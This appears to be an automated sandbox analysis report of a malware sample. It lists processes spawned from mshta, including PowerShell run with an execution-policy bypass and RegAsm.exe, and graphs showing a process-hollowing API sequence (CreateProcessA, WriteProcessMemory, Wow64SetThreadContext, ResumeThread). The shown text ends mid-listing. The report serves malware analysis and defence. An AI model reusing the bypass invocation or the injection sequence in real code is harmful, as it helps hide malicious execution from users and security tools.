                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:01:17:57
                                                                                                      Start date:20/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:powershell -NoProfile -ExecutionPolicy Bypass -Command -
                                                                                                      Imagebase:0xc70000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:01:18:02
                                                                                                      Start date:20/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"
                                                                                                      Imagebase:0x4f0000
                                                                                                      File size:2'141'552 bytes
                                                                                                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:01:18:03
                                                                                                      Start date:20/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1090.tmp" "c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:46'832 bytes
                                                                                                      MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:01:18:03
                                                                                                      Start date:20/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                                                                      Imagebase:0xb40000
                                                                                                      File size:65'440 bytes
                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Reset < >
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1681048870.0000000005F50000.00000010.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_5f50000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                        • Instruction ID: 48bbdcb85228a6cff182476d488c47a598f7e3bc30bf842b6935cf8546523e83
                                                                                                        • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1681048870.0000000005F50000.00000010.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_5f50000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                        • Instruction ID: 48bbdcb85228a6cff182476d488c47a598f7e3bc30bf842b6935cf8546523e83
                                                                                                        • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1681048870.0000000005F50000.00000010.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_5f50000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                        • Instruction ID: 48bbdcb85228a6cff182476d488c47a598f7e3bc30bf842b6935cf8546523e83
                                                                                                        • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                        • Instruction Fuzzy Hash:

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:7.5%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:19
                                                                                                        Total number of Limit Nodes:1
                                                                                                        execution_graph 6357 4e559a0 6359 4e559c6 6357->6359 6358 4e55e2c 6359->6358 6364 4e56770 WriteProcessMemory 6359->6364 6365 4e56768 WriteProcessMemory 6359->6365 6366 4e565d1 Wow64SetThreadContext 6359->6366 6367 4e565d8 Wow64SetThreadContext 6359->6367 6368 4e569ec 6359->6368 6372 4e569f8 6359->6372 6376 4e56526 6359->6376 6380 4e56528 6359->6380 6364->6359 6365->6359 6366->6359 6367->6359 6369 4e56a81 CreateProcessA 6368->6369 6371 4e56c43 6369->6371 6373 4e56a81 CreateProcessA 6372->6373 6375 4e56c43 6373->6375 6377 4e56528 ResumeThread 6376->6377 6379 4e56599 6377->6379 6379->6359 6381 4e56568 ResumeThread 6380->6381 6383 4e56599 6381->6383 6383->6359

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 79125a0-79125c5 1 7912709-7912755 0->1 2 79125cb-79125d0 0->2 8 79128a6-79128ec 1->8 9 791275b-7912760 1->9 3 79125d2-79125d8 2->3 4 79125e8-79125f4 2->4 6 79125da 3->6 7 79125dc-79125e6 3->7 14 79126b6-79126c0 4->14 15 79125fa-79125fd 4->15 6->4 7->4 26 79128f2-79128f7 8->26 27 7912b4a-7912b7c 8->27 12 7912762-7912768 9->12 13 7912778-791277c 9->13 19 791276a 12->19 20 791276c-7912776 12->20 16 7912782-7912784 13->16 17 7912856-7912860 13->17 21 79126c2-79126cb 14->21 22 79126ce-79126d4 14->22 15->14 23 7912603-791260a 15->23 24 79127c7 16->24 25 7912786-7912797 16->25 28 7912862-791286b 17->28 29 791286e-7912874 17->29 19->13 20->13 30 79126d6-79126d8 22->30 31 79126da-79126e6 22->31 23->1 32 7912610-7912615 23->32 35 79127c9-79127cb 24->35 25->8 55 791279d-79127a5 25->55 36 79128f9-79128ff 26->36 37 791290f-7912913 26->37 64 7912bb5-7912bbf 27->64 65 7912b7e-7912b9b 27->65 40 7912876-7912878 29->40 41 791287a-7912886 29->41 39 79126e8-7912706 30->39 31->39 33 7912617-791261d 32->33 34 791262d-7912631 32->34 44 7912621-791262b 33->44 45 791261f 33->45 34->14 48 7912637-7912639 34->48 35->17 51 79127d1-79127d3 35->51 52 7912901 36->52 53 7912903-791290d 36->53 46 7912af2-7912afc 37->46 47 7912919-791291d 37->47 42 7912888-79128a3 40->42 41->42 44->34 45->34 56 7912b0a-7912b10 46->56 57 7912afe-7912b07 46->57 60 791295d 47->60 61 791291f-7912930 47->61 48->14 63 791263b 48->63 58 79127d5-79127db 51->58 59 79127ed-79127f9 51->59 52->37 53->37 70 79127a7-79127ad 55->70 71 79127bd-79127c5 55->71 74 7912b12-7912b14 56->74 75 7912b16-7912b22 56->75 72 79127dd 58->72 73 79127df-79127eb 58->73 94 7912811-7912853 59->94 95 79127fb-7912801 59->95 77 791295f-7912961 60->77 61->27 96 7912936-791293b 61->96 86 7912642-7912644 63->86 67 7912bc1-7912bc5 64->67 68 7912bc8-7912bce 64->68 99 7912c05-7912c0a 65->99 100 7912b9d-7912baf 65->100 78 7912bd0-7912bd2 68->78 79 7912bd4-7912be0 68->79 80 79127b1-79127bb 70->80 81 79127af 70->81 71->35 72->59 73->59 82 7912b24-7912b47 74->82 75->82 77->46 88 7912967-791296d 77->88 90 7912be2-7912c02 78->90 79->90 80->71 81->71 97 7912646-791264c 86->97 98 791265c-79126b3 86->98 88->46 89 7912973-7912980 88->89 101 7912a16-7912a55 89->101 102 7912986-791298b 89->102 106 7912803 95->106 107 7912805-7912807 95->107 108 7912953-791295b 96->108 109 791293d-7912943 96->109 110 7912650-7912652 97->110 111 791264e 97->111 99->100 100->64 138 7912a5c-7912a60 101->138 114 79129a3-79129b9 102->114 115 791298d-7912993 102->115 106->94 107->94 108->77 118 7912945 109->118 119 7912947-7912951 109->119 110->98 111->98 114->101 128 79129bb-79129db 114->128 120 7912995 115->120 121 7912997-79129a1 115->121 118->108 119->108 120->114 121->114 132 79129f5-7912a14 128->132 133 79129dd-79129e3 128->133 132->138 134 79129e5 133->134 135 79129e7-79129f3 133->135 134->132 135->132 140 7912a83 138->140 141 7912a62-7912a6b 138->141 145 7912a86-7912a92 140->145 143 7912a72-7912a7f 141->143 144 7912a6d-7912a70 141->144 146 7912a81 143->146 144->146 148 7912a98-7912aef 145->148 146->145
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1745060325.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7910000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                        • API String ID: 0-2387245862
                                                                                                        • Opcode ID: 4c42f6b7d40724653587fab39b4ef88e54de7e3754a42a3c488617d828a6daa3
                                                                                                        • Instruction ID: 6f4eca86f11c7a23a93cec7c8f8cf7159e84109f8b1e724e464bad639202b869
                                                                                                        • Opcode Fuzzy Hash: 4c42f6b7d40724653587fab39b4ef88e54de7e3754a42a3c488617d828a6daa3
                                                                                                        • Instruction Fuzzy Hash: C5022771B4420E8FCB14EF68D944B6ABBE6FF85324F1484AAD4058F391DB31D865C791

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 150 7911f70-7911f93 151 7912113-791215d 150->151 152 7911f99-7911f9e 150->152 164 7912163-7912168 151->164 165 79122a7-79122f3 151->165 153 7911fa0-7911fa6 152->153 154 7911fb6-7911fba 152->154 155 7911fa8 153->155 156 7911faa-7911fb4 153->156 157 7911fc0-7911fc2 154->157 158 79120c3-79120cd 154->158 155->154 156->154 162 7911fd2 157->162 163 7911fc4-7911fd0 157->163 160 79120db-79120e1 158->160 161 79120cf-79120d8 158->161 166 79120e3-79120e5 160->166 167 79120e7-79120f3 160->167 169 7911fd4-7911fd6 162->169 163->169 171 7912180-7912184 164->171 172 791216a-7912170 164->172 180 79122f9-79122fe 165->180 181 79124ce-79124fd 165->181 176 79120f5-7912110 166->176 167->176 169->158 179 7911fdc-7911ffb 169->179 177 7912251-791225b 171->177 178 791218a-791218c 171->178 173 7912172 172->173 174 7912174-791217e 172->174 173->171 174->171 183 7912269-791226f 177->183 184 791225d-7912266 177->184 185 791219c 178->185 186 791218e-791219a 178->186 212 791201a 179->212 213 7911ffd-7912018 179->213 189 7912300-7912306 180->189 190 7912316-791231a 180->190 203 791251c 181->203 204 79124ff-791251a 181->204 191 7912271-7912273 183->191 192 7912275-7912281 183->192 193 791219e-79121a0 185->193 186->193 196 7912308 189->196 197 791230a-7912314 189->197 200 7912320-7912324 190->200 201 791247b-7912485 190->201 198 7912283-79122a4 191->198 192->198 193->177 199 79121a6-79121aa 193->199 196->190 197->190 199->177 208 79121b0-79121b4 199->208 210 7912337 200->210 211 7912326-7912335 200->211 205 7912493-7912499 201->205 206 7912487-7912490 201->206 217 791251e-7912520 203->217 204->217 215 791249b-791249d 205->215 216 791249f-79124ab 205->216 208->177 218 79121ba-79121bc 208->218 219 7912339-791233b 210->219 211->219 227 791201c-791201e 212->227 213->227 222 79124ad-79124cb 215->222 216->222 223 7912522-7912532 217->223 224 7912535-791253f 217->224 225 79121d6-79121ed 218->225 226 79121be-79121c4 218->226 219->201 228 7912341-7912361 219->228 229 7912541-7912547 224->229 230 791254a-7912550 224->230 246 79121f4-7912242 225->246 247 79121ef-79121f2 225->247 234 79121c6 226->234 235 79121c8-79121d4 226->235 227->158 232 7912024-7912043 227->232 254 7912380 228->254 255 7912363-791237e 228->255 238 7912552-7912554 230->238 239 7912556-7912562 230->239 260 7912045-791204b 232->260 261 791205b-7912066 232->261 234->225 235->225 245 7912564-791257c 238->245 239->245 253 7912247-791224e 246->253 247->253 259 7912382-7912384 254->259 255->259 259->201 266 791238a-791238c 259->266 262 791204d 260->262 263 791204f-7912051 260->263 271 7912068-791206e 261->271 272 791207e-79120c0 261->272 262->261 263->261 269 791239c 266->269 270 791238e-791239a 266->270 275 791239e-79123a0 269->275 270->275 276 7912070 271->276 277 7912072-7912074 271->277 275->201 279 79123a6-79123c6 275->279 276->272 277->272 285 79123c8-79123ce 279->285 286 79123de-79123e2 279->286 287 79123d0 285->287 288 79123d2-79123d4 285->288 289 79123e4-79123ea 286->289 290 79123fc-7912400 286->290 287->286 288->286 291 79123ec 289->291 292 79123ee-79123fa 289->292 293 7912407-7912409 290->293 291->290 292->290 294 7912421-7912478 293->294 295 791240b-7912411 293->295 297 7912413 295->297 298 7912415-7912417 295->298 297->294 298->294
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1745060325.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7910000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-3199432138
                                                                                                        • Opcode ID: 725fcef198ec09e2eee45615e803144d8f33af98564dae039ff9f9206b23f197
                                                                                                        • Instruction ID: c105c654f071d53534b482a75c7b7d5a53daa82d5ef4a8399b86405a1bf2d189
                                                                                                        • Opcode Fuzzy Hash: 725fcef198ec09e2eee45615e803144d8f33af98564dae039ff9f9206b23f197
                                                                                                        • Instruction Fuzzy Hash: 71F15AB170430E8FCB15AB79981076EBBE9BF85218F24847AD505CB291DF31C9A6C7A1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 300 79122bc-79122f3 301 79122f9-79122fe 300->301 302 79124ce-79124fd 300->302 303 7912300-7912306 301->303 304 7912316-791231a 301->304 310 791251c 302->310 311 79124ff-791251a 302->311 306 7912308 303->306 307 791230a-7912314 303->307 308 7912320-7912324 304->308 309 791247b-7912485 304->309 306->304 307->304 314 7912337 308->314 315 7912326-7912335 308->315 312 7912493-7912499 309->312 313 7912487-7912490 309->313 319 791251e-7912520 310->319 311->319 317 791249b-791249d 312->317 318 791249f-79124ab 312->318 320 7912339-791233b 314->320 315->320 322 79124ad-79124cb 317->322 318->322 323 7912522-7912532 319->323 324 7912535-791253f 319->324 320->309 325 7912341-7912361 320->325 326 7912541-7912547 324->326 327 791254a-7912550 324->327 339 7912380 325->339 340 7912363-791237e 325->340 330 7912552-7912554 327->330 331 7912556-7912562 327->331 335 7912564-791257c 330->335 331->335 342 7912382-7912384 339->342 340->342 342->309 344 791238a-791238c 342->344 346 791239c 344->346 347 791238e-791239a 344->347 349 791239e-79123a0 346->349 347->349 349->309 350 79123a6-79123c6 349->350 353 79123c8-79123ce 350->353 354 79123de-79123e2 350->354 355 79123d0 353->355 356 79123d2-79123d4 353->356 357 79123e4-79123ea 354->357 358 79123fc-7912400 354->358 355->354 356->354 359 79123ec 357->359 360 79123ee-79123fa 357->360 361 7912407-7912409 358->361 359->358 360->358 362 7912421-7912478 361->362 363 791240b-7912411 361->363 365 7912413 363->365 366 7912415-7912417 363->366 365->362 366->362
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1745060325.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7910000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$$^q$$^q
                                                                                                        • API String ID: 0-2291298209
                                                                                                        • Opcode ID: c5b7c4d026f0b7e81a14e8b334203be354229a04866713ea69ee75a6f55d1439
                                                                                                        • Instruction ID: 64e7f7ff48e0ba1021c58a89368932707de2081aa235ef6f2f9b4eda5c07578e
                                                                                                        • Opcode Fuzzy Hash: c5b7c4d026f0b7e81a14e8b334203be354229a04866713ea69ee75a6f55d1439
                                                                                                        • Instruction Fuzzy Hash: 003137F0B0430ECFDB20BF248900779BBA9BF81B18F644426D804DB191EB75D5A6C7A1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 368 4e569ec-4e56a8d 370 4e56ac6-4e56ae6 368->370 371 4e56a8f-4e56a99 368->371 376 4e56b1f-4e56b4e 370->376 377 4e56ae8-4e56af2 370->377 371->370 372 4e56a9b-4e56a9d 371->372 374 4e56ac0-4e56ac3 372->374 375 4e56a9f-4e56aa9 372->375 374->370 378 4e56aad-4e56abc 375->378 379 4e56aab 375->379 387 4e56b87-4e56c41 CreateProcessA 376->387 388 4e56b50-4e56b5a 376->388 377->376 380 4e56af4-4e56af6 377->380 378->378 381 4e56abe 378->381 379->378 382 4e56b19-4e56b1c 380->382 383 4e56af8-4e56b02 380->383 381->374 382->376 385 4e56b04 383->385 386 4e56b06-4e56b15 383->386 385->386 386->386 389 4e56b17 386->389 399 4e56c43-4e56c49 387->399 400 4e56c4a-4e56cd0 387->400 388->387 390 4e56b5c-4e56b5e 388->390 389->382 392 4e56b81-4e56b84 390->392 393 4e56b60-4e56b6a 390->393 392->387 394 4e56b6c 393->394 395 4e56b6e-4e56b7d 393->395 394->395 395->395 396 4e56b7f 395->396 396->392 399->400 410 4e56ce0-4e56ce4 400->410 411 4e56cd2-4e56cd6 400->411 413 4e56cf4-4e56cf8 410->413 414 4e56ce6-4e56cea 410->414 411->410 412 4e56cd8-4e56cdb call 4e5050c 411->412 412->410 415 4e56d08-4e56d0c 413->415 416 4e56cfa-4e56cfe 413->416 414->413 418 4e56cec-4e56cef call 4e5050c 414->418 421 4e56d1e-4e56d25 415->421 422 4e56d0e-4e56d14 415->422 416->415 420 4e56d00-4e56d03 call 4e5050c 416->420 418->413 420->415 424 4e56d27-4e56d36 421->424 425 4e56d3c 421->425 422->421 424->425 427 4e56d3d 425->427 427->427
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04E56C2E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 44b097f61a40d1ca2e7c3cd1cd34626ecae8b6b2ff622b35ecbc586e4ecb71e4
                                                                                                        • Instruction ID: 4d289ccb2bda2c33e346971701a249ad531be139691be5b4092b28bf76262ed8
                                                                                                        • Opcode Fuzzy Hash: 44b097f61a40d1ca2e7c3cd1cd34626ecae8b6b2ff622b35ecbc586e4ecb71e4
                                                                                                        • Instruction Fuzzy Hash: 7EA16D71D002199FEF20DFA8C8417EDBBB2FF48318F5485A9E849A7250DB74A985CF91

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 428 4e569f8-4e56a8d 430 4e56ac6-4e56ae6 428->430 431 4e56a8f-4e56a99 428->431 436 4e56b1f-4e56b4e 430->436 437 4e56ae8-4e56af2 430->437 431->430 432 4e56a9b-4e56a9d 431->432 434 4e56ac0-4e56ac3 432->434 435 4e56a9f-4e56aa9 432->435 434->430 438 4e56aad-4e56abc 435->438 439 4e56aab 435->439 447 4e56b87-4e56c41 CreateProcessA 436->447 448 4e56b50-4e56b5a 436->448 437->436 440 4e56af4-4e56af6 437->440 438->438 441 4e56abe 438->441 439->438 442 4e56b19-4e56b1c 440->442 443 4e56af8-4e56b02 440->443 441->434 442->436 445 4e56b04 443->445 446 4e56b06-4e56b15 443->446 445->446 446->446 449 4e56b17 446->449 459 4e56c43-4e56c49 447->459 460 4e56c4a-4e56cd0 447->460 448->447 450 4e56b5c-4e56b5e 448->450 449->442 452 4e56b81-4e56b84 450->452 453 4e56b60-4e56b6a 450->453 452->447 454 4e56b6c 453->454 455 4e56b6e-4e56b7d 453->455 454->455 455->455 456 4e56b7f 455->456 456->452 459->460 470 4e56ce0-4e56ce4 460->470 471 4e56cd2-4e56cd6 460->471 473 4e56cf4-4e56cf8 470->473 474 4e56ce6-4e56cea 470->474 471->470 472 4e56cd8-4e56cdb call 4e5050c 471->472 472->470 475 4e56d08-4e56d0c 473->475 476 4e56cfa-4e56cfe 473->476 474->473 478 4e56cec-4e56cef call 4e5050c 474->478 481 4e56d1e-4e56d25 475->481 482 4e56d0e-4e56d14 475->482 476->475 480 4e56d00-4e56d03 call 4e5050c 476->480 478->473 480->475 484 4e56d27-4e56d36 481->484 485 4e56d3c 481->485 482->481 484->485 487 4e56d3d 485->487 487->487
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04E56C2E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 1facda0c527549d8a69fa41c61ac132772aae60489eb1efe06d4e40707842d73
                                                                                                        • Instruction ID: 9f9b4ed60fc2657959cf7b401084b9659ba551b2fd4429e8127903845fd929d2
                                                                                                        • Opcode Fuzzy Hash: 1facda0c527549d8a69fa41c61ac132772aae60489eb1efe06d4e40707842d73
                                                                                                        • Instruction Fuzzy Hash: 93916B71D002199FEF20DFA9C8417DDBBB2FF48318F1485AAE849A7250DB74A985CF91

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 488 4e56768-4e567be 490 4e567c0-4e567cc 488->490 491 4e567ce-4e5680d WriteProcessMemory 488->491 490->491 493 4e56816-4e56846 491->493 494 4e5680f-4e56815 491->494 494->493
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04E56800
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: f5cc0b6aad6121375db71033384d94666f48760faaee7500868b2b0e5980e850
                                                                                                        • Instruction ID: 30b847daed172c1dafd1905ab198a3e8f2d027ae2b7927c44898fa4308361f3d
                                                                                                        • Opcode Fuzzy Hash: f5cc0b6aad6121375db71033384d94666f48760faaee7500868b2b0e5980e850
                                                                                                        • Instruction Fuzzy Hash: 6D215AB19003599FDB10CFA9C845BEEBBF1FF88324F50842AE958A7250D778A954CB64

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 498 4e56770-4e567be 500 4e567c0-4e567cc 498->500 501 4e567ce-4e5680d WriteProcessMemory 498->501 500->501 503 4e56816-4e56846 501->503 504 4e5680f-4e56815 501->504 504->503
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04E56800
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 5207e2b4b0c6e82bfd9ccadcb79ac72348415a90b4552a7273de9fbcd37d42f4
                                                                                                        • Instruction ID: b1f540b666f3db5667ed88516b8bf202bc4eb7bfc85ce3a91ad9f318cfb0a59e
                                                                                                        • Opcode Fuzzy Hash: 5207e2b4b0c6e82bfd9ccadcb79ac72348415a90b4552a7273de9fbcd37d42f4
                                                                                                        • Instruction Fuzzy Hash: C8213BB19003599FDB10CFA9C845BDEBBF5FF48324F108429E958A7250D778A554CBA4

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 508 4e565d1-4e56623 510 4e56625-4e56631 508->510 511 4e56633-4e56663 Wow64SetThreadContext 508->511 510->511 513 4e56665-4e5666b 511->513 514 4e5666c-4e5669c 511->514 513->514
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E56656
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 911c47fd309406ac16738de74dbdc3568490501430cc18acd0184a2ad2239c93
                                                                                                        • Instruction ID: e871dfbd11e8def5f707fcb7e4ad82dd217f00cf740931a06455621e3a3bbbc3
                                                                                                        • Opcode Fuzzy Hash: 911c47fd309406ac16738de74dbdc3568490501430cc18acd0184a2ad2239c93
                                                                                                        • Instruction Fuzzy Hash: 2A216AB19002498FDB10DFAAC4857EFBBF4EF88324F54842ED459A7250C778A944CFA5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 518 4e565d8-4e56623 520 4e56625-4e56631 518->520 521 4e56633-4e56663 Wow64SetThreadContext 518->521 520->521 523 4e56665-4e5666b 521->523 524 4e5666c-4e5669c 521->524 523->524
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E56656
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 17f1033fca62ff85b7e351ff6a2eeb2cfdbc2f1b57814da200e059a7a0e3e3dd
                                                                                                        • Instruction ID: aedff9b9e531a686c21229a783b0e68199232889deabf15bfa00a9be8120d630
                                                                                                        • Opcode Fuzzy Hash: 17f1033fca62ff85b7e351ff6a2eeb2cfdbc2f1b57814da200e059a7a0e3e3dd
                                                                                                        • Instruction Fuzzy Hash: 032149B1D003098FDB10DFAAC4857EEBBF4EF48324F54842AD459A7250DB78A984CFA5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 528 4e56526-4e56597 ResumeThread 532 4e565a0-4e565c5 528->532 533 4e56599-4e5659f 528->533 533->532
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
